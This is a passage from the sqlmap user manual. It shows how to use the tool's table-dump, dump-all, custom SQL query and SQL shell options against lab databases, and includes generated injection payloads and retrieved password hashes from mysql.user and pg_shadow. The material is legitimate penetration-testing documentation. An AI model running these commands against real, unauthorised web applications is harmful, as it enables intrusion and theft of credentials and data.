Database: master
|
|
Table: users
|
|
[3 columns]
|
|
+---------+---------+
|
|
| Column | Type |
|
|
+---------+---------+
|
|
| id | int |
|
|
| name | varchar |
|
|
| surname | varchar |
|
|
+---------+---------+
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
Example on a <bf>PostgreSQL 8.2.7</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&cat=2" --columns \
|
|
-T users -D public
|
|
|
|
Database: public
|
|
Table: users
|
|
[3 columns]
|
|
+---------+--------+
|
|
| Column | Type |
|
|
+---------+--------+
|
|
| id | int4 |
|
|
| name | bpchar |
|
|
| surname | bpchar |
|
|
+---------+--------+
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
Note that on PostgreSQL you have to provide <tt>public</tt> or the
|
|
name of a system database because it is not possible to enumerate other
|
|
databases tables, only the users' schema that the web application's user
|
|
is connected to, which is always <tt>public</tt>.
|
|
|
|
|
|
<sect2>Dump database tables entries
|
|
|
|
<p>
|
|
Options: <tt>--dump</tt>, <tt>-C</tt>, <tt>-T</tt>, <tt>-D</tt>,
|
|
<tt>--start</tt> and <tt>--stop</tt>
|
|
|
|
<p>
|
|
It is possible to dump the entries for a specific database table.
|
|
This functionality depends on both <tt>-T</tt> to specify the table name
|
|
and on <tt>-D</tt> to specify the database name.
|
|
|
|
<p>
|
|
Example on a <bf>MySQL 5.0.51</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2" --dump \
|
|
-T users -D test
|
|
|
|
Database: test
|
|
Table: users
|
|
[5 entries]
|
|
+----+----------------------------------------------+-------------------+
|
|
| id | name | surname |
|
|
+----+----------------------------------------------+-------------------+
|
|
| 1 | luther | blissett |
|
|
| 2 | fluffy | bunny |
|
|
| 3 | wu | ming |
|
|
| 4 | sqlmap/0.6.3 (http://sqlmap.sourceforge.net) | user agent header |
|
|
| 5 | NULL | nameisnull |
|
|
+----+----------------------------------------------+-------------------+
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
You can also provide the <tt>-C</tt> option to specify the table column
|
|
that you want to enumerate the entries.
|
|
|
|
<p>
|
|
Example on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1&cat=2" --dump \
|
|
-T users -D master -C surname
|
|
|
|
Database: master
|
|
Table: users
|
|
[5 entries]
|
|
+-------------------+
|
|
| surname |
|
|
+-------------------+
|
|
| blisset |
|
|
| bunny |
|
|
| ming |
|
|
| nameisnull |
|
|
| user agent header |
|
|
+-------------------+
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
sqlmap also stores for each table the dumped entries in a CSV format file.
|
|
You can see the absolute path where it stored the dumped tables entries
|
|
by providing a verbosity level greater than or equal to 1.
|
|
|
|
<p>
|
|
Example on a <bf>PostgreSQL 8.2.7</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&cat=2" --dump \
|
|
-T users -D public -v 1
|
|
|
|
[...]
|
|
Database: public
|
|
Table: users
|
|
[5 entries]
|
|
+----+----------------------------------------------+-------------------+
|
|
| id | name | surname |
|
|
+----+----------------------------------------------+-------------------+
|
|
| 1 | luther | blissett |
|
|
| 2 | fluffy | bunny |
|
|
| 3 | wu | ming |
|
|
| 4 | sqlmap/0.6.3 (http://sqlmap.sourceforge.net) | user agent header |
|
|
| 5 | | nameisnull |
|
|
+----+----------------------------------------------+-------------------+
|
|
|
|
[hh:mm:59] [INFO] Table 'public.users' dumped to CSV file '/software/sqlmap/output/
|
|
192.168.1.121/dump/public/users.csv'
|
|
[hh:mm:59] [INFO] Fetched data logged to text files under '/software/sqlmap/output/
|
|
192.168.1.121'
|
|
|
|
$ cat /software/sqlmap/output/192.168.1.121/dump/public/users.csv
|
|
"id","name","surname"
|
|
"1","luther","blissett"
|
|
"2","fluffy","bunny"
|
|
"3","wu","ming"
|
|
"4","sqlmap/0.6.3 (http://sqlmap.sourceforge.net)","user agent header"
|
|
"5","","nameisnull"
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
You can also provide the <tt>--start</tt> and/or the <tt>--stop</tt> option
|
|
to limit the dump to a range of entries.
|
|
|
|
<itemize>
|
|
<item><tt>--start</tt> specifies the first entry to enumerate
|
|
<item><tt>--stop</tt> specifies the last entry to enumerate
|
|
</itemize>
|
|
|
|
<p>
|
|
Example on a <bf>MySQL 5.0.51</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2" --dump \
|
|
-T users -D test --start 2 --stop 4
|
|
|
|
Database: test
|
|
Table: users
|
|
[3 entries]
|
|
+----+----------------------------------------------+-------------------+
|
|
| id | name | surname |
|
|
+----+----------------------------------------------+-------------------+
|
|
| 2 | fluffy | bunny |
|
|
| 3 | wu | ming |
|
|
| 4 | sqlmap/0.6.3 (http://sqlmap.sourceforge.net) | user agent header |
|
|
+----+----------------------------------------------+-------------------+
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
As you can see, sqlmap is very flexible: you can leave it automatically
|
|
enumerate the whole database table up to a single column of a specific
|
|
table entry.
|
|
|
|
|
|
<sect2>Dump all databases tables entries
|
|
|
|
<p>
|
|
Options: <tt>--dump-all</tt> and <tt>--exclude-sysdbs</tt>
|
|
|
|
<p>
|
|
It is possible to dump all databases tables entries at once.
|
|
|
|
Example on a <bf>MySQL 5.0.51</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2" --dump-all
|
|
|
|
Database: test
|
|
Table: users
|
|
[5 entries]
|
|
+----+----------------------------------------------+-------------------+
|
|
| id | name | surname |
|
|
+----+----------------------------------------------+-------------------+
|
|
| 1 | luther | blissett |
|
|
| 2 | fluffy | bunny |
|
|
| 3 | wu | ming |
|
|
| 4 | sqlmap/0.6.3 (http://sqlmap.sourceforge.net) | user agent header |
|
|
| 5 | NULL | nameisnull |
|
|
+----+----------------------------------------------+-------------------+
|
|
|
|
Database: information_schema
|
|
Table: CHARACTER_SETS
|
|
[36 entries]
|
|
+--------------------+----------------------+-----------------------------+--------+
|
|
| CHARACTER_SET_NAME | DEFAULT_COLLATE_NAME | DESCRIPTION | MAXLEN |
|
|
+--------------------+----------------------+-----------------------------+--------+
|
|
| tis620 | tis620_thai_ci | TIS620 Thai | 1 |
|
|
| macroman | macroman_general_ci | Mac West European | 1 |
|
|
| dec8 | dec8_swedish_ci | DEC West European | 1 |
|
|
| ujis | ujis_japanese_ci | EUC-JP Japanese | 3 |
|
|
| eucjpms | eucjpms_japanese_ci | UJIS for Windows Japanese | 3 |
|
|
| armscii8 | armscii8_general_ci | ARMSCII-8 Armenian | 1 |
|
|
| ucs2 | ucs2_general_ci | UCS-2 Unicode | 2 |
|
|
| hp8 | hp8_english_ci | HP West European | 1 |
|
|
| latin2 | latin2_general_ci | ISO 8859-2 Central European | 1 |
|
|
| koi8u | koi8u_general_ci | KOI8-U Ukrainian | 1 |
|
|
| keybcs2 | keybcs2_general_ci | DOS Kamenicky Czech-Slovak | 1 |
|
|
| ascii | ascii_general_ci | US ASCII | 1 |
|
|
| cp866 | cp866_general_ci | DOS Russian | 1 |
|
|
| cp1256 | cp1256_general_ci | Windows Arabic | 1 |
|
|
| macce | macce_general_ci | Mac Central European | 1 |
|
|
| sjis | sjis_japanese_ci | Shift-JIS Japanese | 2 |
|
|
| geostd8 | geostd8_general_ci | GEOSTD8 Georgian | 1 |
|
|
| cp1257 | cp1257_general_ci | Windows Baltic | 1 |
|
|
| cp852 | cp852_general_ci | DOS Central European | 1 |
|
|
| euckr | euckr_korean_ci | EUC-KR Korean | 2 |
|
|
| cp1250 | cp1250_general_ci | Windows Central European | 1 |
|
|
| cp1251 | cp1251_general_ci | Windows Cyrillic | 1 |
|
|
| binary | binary | Binary pseudo charset | 1 |
|
|
| big5 | big5_chinese_ci | Big5 Traditional Chinese | 2 |
|
|
| gb2312 | gb2312_chinese_ci | GB2312 Simplified Chinese | 2 |
|
|
| hebrew | hebrew_general_ci | ISO 8859-8 Hebrew | 1 |
|
|
| koi8r | koi8r_general_ci | KOI8-R Relcom Russian | 1 |
|
|
| greek | greek_general_ci | ISO 8859-7 Greek | 1 |
|
|
| cp850 | cp850_general_ci | DOS West European | 1 |
|
|
| utf8 | utf8_general_ci | UTF-8 Unicode | 3 |
|
|
| latin1 | latin1_swedish_ci | cp1252 West European | 1 |
|
|
| latin7 | latin7_general_ci | ISO 8859-13 Baltic | 1 |
|
|
| cp932 | cp932_japanese_ci | SJIS for Windows Japanese | 2 |
|
|
| latin5 | latin5_turkish_ci | ISO 8859-9 Turkish | 1 |
|
|
| swe7 | swe7_swedish_ci | 7bit Swedish | 1 |
|
|
| gbk | gbk_chinese_ci | GBK Simplified Chinese | 2 |
|
|
+--------------------+----------------------+-----------------------------+--------+
|
|
|
|
[...]
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
You can also provide the <tt>--exclude-sysdbs</tt> option to exclude all
|
|
system databases so that sqlmap will only dump entries of users' databases
|
|
tables.
|
|
|
|
<p>
|
|
Example on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1&cat=2" --dump-all \
|
|
--exclude-sysdbs
|
|
|
|
Database: master
|
|
Table: spt_datatype_info_ext
|
|
[10 entries]
|
|
+----------------+-----------------+-----------+-----------+
|
|
| AUTO_INCREMENT | CREATE_PARAMS | typename | user_type |
|
|
+----------------+-----------------+-----------+-----------+
|
|
| 0 | length | char | 175 |
|
|
| 0 | precision,scale | numeric | 108 |
|
|
| 0 | max length | varbinary | 165 |
|
|
| 0 | precision,scale | decimal | 106 |
|
|
| 1 | precision | numeric | 108 |
|
|
| 0 | length | nchar | 239 |
|
|
| 0 | max length | nvarchar | 231 |
|
|
| 0 | length | binary | 173 |
|
|
| 0 | max length | varchar | 167 |
|
|
| 1 | precision | decimal | 106 |
|
|
+----------------+-----------------+-----------+-----------+
|
|
|
|
[...]
|
|
|
|
Database: master
|
|
Table: users
|
|
[5 entries]
|
|
+----+----------------------------------------------+-------------------+
|
|
| id | name | surname |
|
|
+----+----------------------------------------------+-------------------+
|
|
| 4 | sqlmap/0.6.3 (http://sqlmap.sourceforge.net) | user agent header |
|
|
| 2 | fluffy | bunny |
|
|
| 1 | luther | blisset |
|
|
| 3 | wu | ming |
|
|
| 5 | NULL | nameisnull |
|
|
+----+----------------------------------------------+-------------------+
|
|
|
|
[...]
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
Note that on Microsoft SQL Server the <tt>master</tt> database is not
|
|
considered a system database because some database administrators use it
|
|
as a users' database.
|
|
|
|
|
|
<sect2>Run your own SQL SELECT statement
|
|
|
|
<p>
|
|
Options: <tt>--sql-query</tt> and <tt>--sql-shell</tt>
|
|
|
|
<p>
|
|
The SQL query and the SQL shell features makes the user able to run
|
|
whatever <tt>SELECT</tt> statement on the web application's back-end
|
|
database management system and retrieve its output.
|
|
|
|
<p>
|
|
Examples on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1&cat=2" --sql-query \
|
|
"SELECT 'foo'" -v 1
|
|
|
|
[...]
|
|
[hh:mm:14] [INFO] fetching SQL SELECT query output: 'SELECT 'foo''
|
|
[hh:mm:14] [INFO] query: SELECT ISNULL(CAST((CHAR(102)+CHAR(111)+CHAR(111)) AS VARCHAR(8000)),
|
|
(CHAR(32)))
|
|
[hh:mm:14] [INFO] retrieved: foo
|
|
[hh:mm:14] [INFO] performed 27 queries in 0 seconds
|
|
SELECT 'foo': 'foo'
|
|
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1&cat=2" --sql-query \
|
|
"SELECT 'foo', 'bar'" -v 1
|
|
|
|
[...]
|
|
[hh:mm:50] [INFO] fetching SQL SELECT query output: 'SELECT 'foo', 'bar''
|
|
[hh:mm:50] [INFO] the SQL query provided has more than a field. sqlmap will now unpack it into
|
|
distinct queries to be able to retrieve the output even if we are going blind
|
|
[hh:mm:50] [INFO] query: SELECT ISNULL(CAST((CHAR(102)+CHAR(111)+CHAR(111)) AS VARCHAR(8000)),
|
|
(CHAR(32)))
|
|
[hh:mm:50] [INFO] retrieved: foo
|
|
[hh:mm:50] [INFO] performed 27 queries in 0 seconds
|
|
[hh:mm:50] [INFO] query: SELECT ISNULL(CAST((CHAR(98)+CHAR(97)+CHAR(114)) AS VARCHAR(8000)),
|
|
(CHAR(32)))
|
|
[hh:mm:50] [INFO] retrieved: bar
|
|
[hh:mm:50] [INFO] performed 27 queries in 0 seconds
|
|
SELECT 'foo', 'bar': 'foo, bar'
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
As you can see from this last example, sqlmap splits the query in two
|
|
different <tt>SELECT</tt> statement to be able to retrieve the output even
|
|
in blind SQL injection technique.
|
|
Otherwise in inband SQL injection technique it only perform a single HTTP
|
|
request to get the user's query output:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1&cat=2" --sql-query \
|
|
"SELECT 'foo', 'bar'" -v 1 --union-use
|
|
|
|
[...]
|
|
[hh:mm:03] [INFO] fetching SQL SELECT query output: 'SELECT 'foo', 'bar''
|
|
[hh:mm:03] [INFO] testing inband sql injection on parameter 'id'
|
|
[hh:mm:03] [INFO] the target url could be affected by an inband sql injection vulnerability
|
|
[hh:mm:03] [INFO] confirming inband sql injection on parameter 'id'
|
|
[hh:mm:03] [INFO] the target url is affected by an exploitable inband sql injection
|
|
vulnerability
|
|
[hh:mm:03] [INFO] query: UNION ALL SELECT NULL, (CHAR(77)+CHAR(68)+CHAR(75)+CHAR(104)+
|
|
CHAR(70)+CHAR(67))+ISNULL(CAST((CHAR(102)+CHAR(111)+CHAR(111)) AS VARCHAR(8000)), (CHAR(32)))
|
|
+(CHAR(105)+CHAR(65)+CHAR(119)+CHAR(105)+CHAR(108)+CHAR(108))+ISNULL(CAST((CHAR(98)+CHAR(97)+
|
|
CHAR(114)) AS VARCHAR(8000)), (CHAR(32)))+(CHAR(66)+CHAR(78)+CHAR(104)+CHAR(75)+CHAR(114)+
|
|
CHAR(116)), NULL-- AND 8373=8373
|
|
[hh:mm:03] [INFO] performed 3 queries in 0 seconds
|
|
SELECT 'foo', 'bar' [1]:
|
|
[*] foo, bar
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
Examples on an <bf>Oracle XE 10.2.0.1</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1&cat=2" --sql-query \
|
|
"SELECT 'foo' FROM dual"
|
|
|
|
[hh:mm:04] [INPUT] does the SQL query that you provide might return multiple entries? [Y/n] n
|
|
SELECT 'foo' FROM dual: 'foo'
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
As you can see, if your <tt>SELECT</tt> statement contains a <tt>FROM</tt>
|
|
clause, sqlmap asks the user if such statement can return multiple entries
|
|
and in such case the tool knows how to unpack the query correctly to
|
|
retrieve its whole output line per line.
|
|
|
|
Example on a <bf>PostgreSQL 8.2.7</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&cat=2" --sql-query \
|
|
"SELECT usename FROM pg_user"
|
|
|
|
[hh:mm:47] [INPUT] does the SQL query that you provide might return multiple entries? [Y/n] y
|
|
[hh:mm:48] [INPUT] the SQL query that you provide can return up to 3 entries. How many entries
|
|
do you want to retrieve?
|
|
[a] All (default)
|
|
[#] Specific number
|
|
[q] Quit
|
|
Choice: 2
|
|
SELECT usename FROM pg_user [2]:
|
|
[*] postgres
|
|
[*] testuser
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
As you can see, in the last example sqlmap counts the number of entries
|
|
for your query and asks how many entries from the top you want to dump.
|
|
Otherwise if you specify also the <tt>LIMIT</tt>, or similar, clause
|
|
sqlmap will not ask anything, just unpack the query and return its
|
|
output.
|
|
|
|
<p>
|
|
Example on a <bf>MySQL 5.0.51</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2" --sql-query \
|
|
"SELECT user, host, password FROM mysql.user LIMIT 1, 3" -v 1
|
|
|
|
[...]
|
|
back-end DBMS: MySQL >= 5.0.0
|
|
|
|
[hh:mm:11] [INFO] fetching SQL SELECT query output: 'SELECT user, host, password FROM
|
|
mysql.user LIMIT 1, 3'
|
|
[hh:mm:12] [INFO] the SQL query provided has more than a field. sqlmap will now unpack
|
|
it into distinct queries to be able to retrieve the output even if we are going blind
|
|
[hh:mm:12] [INFO] query: SELECT IFNULL(CAST(user AS CHAR(10000)), CHAR(32)) FROM mysql.user
|
|
ORDER BY user ASC LIMIT 1, 1
|
|
[hh:mm:12] [INFO] retrieved: root
|
|
[hh:mm:12] [INFO] performed 34 queries in 0 seconds
|
|
[hh:mm:12] [INFO] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM mysql.user
|
|
ORDER BY user ASC LIMIT 1, 1
|
|
[hh:mm:12] [INFO] retrieved: localhost
|
|
[hh:mm:12] [INFO] performed 69 queries in 0 seconds
|
|
[hh:mm:12] [INFO] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) FROM mysql.user
|
|
ORDER BY user ASC LIMIT 1, 1
|
|
[hh:mm:12] [INFO] retrieved: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
|
|
[hh:mm:13] [INFO] performed 293 queries in 0 seconds
|
|
[hh:mm:13] [INFO] query: SELECT IFNULL(CAST(user AS CHAR(10000)), CHAR(32)) FROM mysql.user
|
|
ORDER BY user ASC LIMIT 2, 1
|
|
[hh:mm:13] [INFO] retrieved: root
|
|
[hh:mm:13] [INFO] performed 34 queries in 0 seconds
|
|
[hh:mm:13] [INFO] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM mysql.user
|
|
ORDER BY user ASC LIMIT 2, 1
|
|
[hh:mm:13] [INFO] retrieved: leboyer
|
|
[hh:mm:13] [INFO] performed 55 queries in 0 seconds
|
|
[hh:mm:13] [INFO] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) FROM mysql.user
|
|
ORDER BY user ASC LIMIT 2, 1
|
|
[hh:mm:13] [INFO] retrieved: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
|
|
[hh:mm:14] [INFO] performed 293 queries in 0 seconds
|
|
[hh:mm:14] [INFO] query: SELECT IFNULL(CAST(user AS CHAR(10000)), CHAR(32)) FROM mysql.user
|
|
ORDER BY user ASC LIMIT 3, 1
|
|
[hh:mm:14] [INFO] retrieved: root
|
|
[hh:mm:14] [INFO] performed 34 queries in 0 seconds
|
|
[hh:mm:14] [INFO] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM mysql.user
|
|
ORDER BY user ASC LIMIT 3, 1
|
|
[hh:mm:14] [INFO] retrieved: 127.0.0.1
|
|
[hh:mm:14] [INFO] performed 69 queries in 0 seconds
|
|
[hh:mm:14] [INFO] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) FROM mysql.user
|
|
ORDER BY user ASC LIMIT 3, 1
|
|
[hh:mm:14] [INFO] retrieved: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
|
|
[hh:mm:15] [INFO] performed 293 queries in 0 seconds
|
|
SELECT user, host, password FROM mysql.user LIMIT 1, 3 [3]:
|
|
[*] root, localhost, *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
|
|
[*] root, leboyer, *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
|
|
[*] root, 127.0.0.1, *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
The SQL shell option gives you access to run your own SQL <tt>SELECT</tt>
|
|
statement interactively, like a SQL console logged into the back-end
|
|
database management system.
|
|
This feature has TAB completion and history support.
|
|
|
|
<p>
|
|
Example of history support on a <bf>PostgreSQL 8.2.7</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&cat=2" --sql-shell
|
|
|
|
sql> SELECT 'foo'
|
|
SELECT 'foo': 'foo'
|
|
|
|
sql> [UP arrow key shows the just run SQL SELECT statement, DOWN arrow key cleans the shell]
|
|
sql> SELECT version()
|
|
SELECT version(): 'PostgreSQL 8.2.7 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3
|
|
(Ubuntu 4.2.3-2ubuntu4)'
|
|
|
|
sql> exit
|
|
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&cat=2" --sql-shell
|
|
|
|
sql> [UP arrow key shows 'exit', then DOWN arrow key clean the shell]
|
|
sql> SELECT usename, passwd FROM pg_shadow ORDER BY usename
|
|
[hh:mm:45] [INPUT] does the SQL query that you provide might return multiple entries? [Y/n] y
|
|
[hh:mm:46] [INPUT] the SQL query that you provide can return up to 3 entries. How many entries
|
|
do you want to retrieve?
|
|
[a] All (default)
|
|
[#] Specific number
|
|
[q] Quit
|
|
Choice:
|
|
SELECT usename, passwd FROM pg_shadow ORDER BY usename [3]:
|
|
[*] postgres, md5d7d880f96044b72d0bba108ace96d1e4
|
|
[*] testuser, md599e5ea7a6f7c3269995cba3927fd0093
|
|
[*] testuser2,
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
Example of TAB completion on a <bf>MySQL 5.0.51</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2" --sql-shell
|
|
|
|
sql> [TAB TAB]
|
|
AND ORD(MID((%s), %d, 1)) > %d
|
|
CAST(%s AS CHAR(10000))
|
|
COUNT(%s)
|
|
CURRENT_USER()
|
|
DATABASE()
|
|
IFNULL(%s, ' ')
|
|
LENGTH(%s)
|
|
LIMIT %d, %d
|
|
MID((%s), %d, %d)
|
|
ORDER BY %s ASC
|
|
SELECT %s FROM %s.%s
|
|
SELECT column_name, column_type FROM information_schema.COLUMNS WHERE table_name='%s' AND
|
|
table_schema='%s'
|
|
SELECT grantee FROM information_schema.USER_PRIVILEGES
|
|
SELECT grantee, privilege_type FROM information_schema.USER_PRIVILEGES
|
|
SELECT schema_name FROM information_schema.SCHEMATA
|
|
SELECT table_schema, table_name FROM information_schema.TABLES
|
|
SELECT user, password FROM mysql.user
|
|
VERSION()
|
|
sql> SE[TAB]
|
|
sql> SELECT
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
As you can see the TAB functionality shows the queries defined for the
|
|
back-end database management system in sqlmap XML queries file, but you
|
|
can run whatever <tt>SELECT</tt> statement that you want.
|
|
|
|
<p>
|
|
Example of asterisk expansion on a <bf>MySQL 5.0.51</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2" --sql-shell \
|
|
-v 1
|
|
|
|
[...]
|
|
[hh:mm:40] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
|
|
sql> SELECT * FROM test.users
|
|
[hh:mm:48] [INFO] fetching SQL SELECT query output: 'SELECT * FROM test.users'
|
|
[hh:mm:48] [INFO] you did not provide the fields in your query. sqlmap will retrieve the column
|
|
names itself.
|
|
[hh:mm:48] [INFO] fetching columns for table 'users' on database 'test'
|
|
[hh:mm:48] [INFO] fetching number of columns for table 'users' on database 'test'
|
|
[hh:mm:48] [INFO] query: SELECT IFNULL(CAST(COUNT(column_name) AS CHAR(10000)), CHAR(32)) FROM
|
|
information_schema.COLUMNS WHERE table_name=CHAR(117,115,101,114,115) AND
|
|
table_schema=CHAR(116,101,115,116)
|
|
[hh:mm:48] [INFO] retrieved: 3
|
|
[hh:mm:48] [INFO] performed 13 queries in 0 seconds
|
|
[hh:mm:48] [INFO] query: SELECT IFNULL(CAST(column_name AS CHAR(10000)), CHAR(32)) FROM
|
|
information_schema.COLUMNS WHERE table_name=CHAR(117,115,101,114,115) AND
|
|
table_schema=CHAR(116,101,115,116) LIMIT 0, 1
|
|
[hh:mm:48] [INFO] retrieved: id
|
|
[hh:mm:48] [INFO] performed 20 queries in 0 seconds
|
|
[hh:mm:48] [INFO] query: SELECT IFNULL(CAST(column_name AS CHAR(10000)), CHAR(32)) FROM
|
|
information_schema.COLUMNS WHERE table_name=CHAR(117,115,101,114,115) AND
|
|
table_schema=CHAR(116,101,115,116) LIMIT 1, 1
|
|
[hh:mm:48] [INFO] retrieved: name
|
|
[hh:mm:48] [INFO] performed 34 queries in 0 seconds
|
|
[hh:mm:48] [INFO] query: SELECT IFNULL(CAST(column_name AS CHAR(10000)), CHAR(32)) FROM
|
|
information_schema.COLUMNS WHERE table_name=CHAR(117,115,101,114,115) AND
|
|
table_schema=CHAR(116,101,115,116) LIMIT 2, 1
|
|
[hh:mm:48] [INFO] retrieved: surname
|
|
[hh:mm:48] [INFO] performed 55 queries in 0 seconds
|
|
[hh:mm:48] [INFO] the query with column names is: SELECT id, name, surname FROM test.users
|
|
[hh:mm:48] [INPUT] does the SQL query that you provide might return multiple entries? [Y/n] y
|
|
[hh:mm:04] [INFO] query: SELECT IFNULL(CAST(COUNT(id) AS CHAR(10000)), CHAR(32)) FROM test.users
|
|
[hh:mm:04] [INFO] retrieved: 5
|
|
[hh:mm:04] [INFO] performed 13 queries in 0 seconds
|
|
[hh:mm:04] [INPUT] the SQL query that you provide can return up to 5 entries. How many entries
|
|
do you want to retrieve?
|
|
[a] All (default)
|
|
[#] Specific number
|
|
[q] Quit
|
|
Choice: 3
|
|
[hh:mm:09] [INFO] sqlmap is now going to retrieve the first 3 query output entries
|
|
[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(id AS CHAR(10000)), CHAR(32)) FROM test.users
|
|
ORDER BY id ASC LIMIT 0, 1
|
|
[hh:mm:09] [INFO] retrieved: 1
|
|
[hh:mm:09] [INFO] performed 13 queries in 0 seconds
|
|
[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(name AS CHAR(10000)), CHAR(32)) FROM test.users
|
|
ORDER BY id ASC LIMIT 0, 1
|
|
[hh:mm:09] [INFO] retrieved: luther
|
|
[hh:mm:09] [INFO] performed 48 queries in 0 seconds
|
|
[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM test.users
|
|
ORDER BY id ASC LIMIT 0, 1
|
|
[hh:mm:09] [INFO] retrieved: blissett
|
|
[hh:mm:09] [INFO] performed 62 queries in 0 seconds
|
|
[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(id AS CHAR(10000)), CHAR(32)) FROM test.users
|
|
ORDER BY id ASC LIMIT 1, 1
|
|
[hh:mm:09] [INFO] retrieved: 2
|
|
[hh:mm:09] [INFO] performed 13 queries in 0 seconds
|
|
[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(name AS CHAR(10000)), CHAR(32)) FROM test.users
|
|
ORDER BY id ASC LIMIT 1, 1
|
|
[hh:mm:09] [INFO] retrieved: fluffy
|
|
[hh:mm:09] [INFO] performed 48 queries in 0 seconds
|
|
[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM test.users
|
|
ORDER BY id ASC LIMIT 1, 1
|
|
[hh:mm:09] [INFO] retrieved: bunny
|
|
[hh:mm:09] [INFO] performed 41 queries in 0 seconds
|
|
[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(id AS CHAR(10000)), CHAR(32)) FROM test.users
|
|
ORDER BY id ASC LIMIT 2, 1
|
|
[hh:mm:09] [INFO] retrieved: 3
|
|
[hh:mm:09] [INFO] performed 13 queries in 0 seconds
|
|
[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(name AS CHAR(10000)), CHAR(32)) FROM test.users
|
|
ORDER BY id ASC LIMIT 2, 1
|
|
[hh:mm:09] [INFO] retrieved: wu
|
|
[hh:mm:09] [INFO] performed 20 queries in 0 seconds
|
|
[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM test.users
|
|
ORDER BY id ASC LIMIT 2, 1
|
|
[hh:mm:09] [INFO] retrieved: ming
|
|
[hh:mm:10] [INFO] performed 34 queries in 0 seconds
|
|
SELECT * FROM test.users [3]:
|
|
[*] 1, luther, blissett
|
|
[*] 2, fluffy, bunny
|
|
[*] 3, wu, ming
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
As you can see in this last example, if the <tt>SELECT</tt> statement has
|
|
an asterisk instead of the column(s) name, sqlmap first retrieves the
|
|
column names of the table then asks if the query can return multiple
|
|
entries and goes on.
|
|
|
|
|
|
<sect1>File system access
|
|
|
|
<sect2>Read a specific file content
|
|
|
|
<p>
|
|
Option: <tt>--read-file</tt>
|
|
|
|
<p>
|
|
If the back-end database management system is MySQL and the current user
|
|
has access to the <tt>LOAD_FILE()</tt> function, it is possible to read
|
|
the content of a specific file from the file system.
|
|
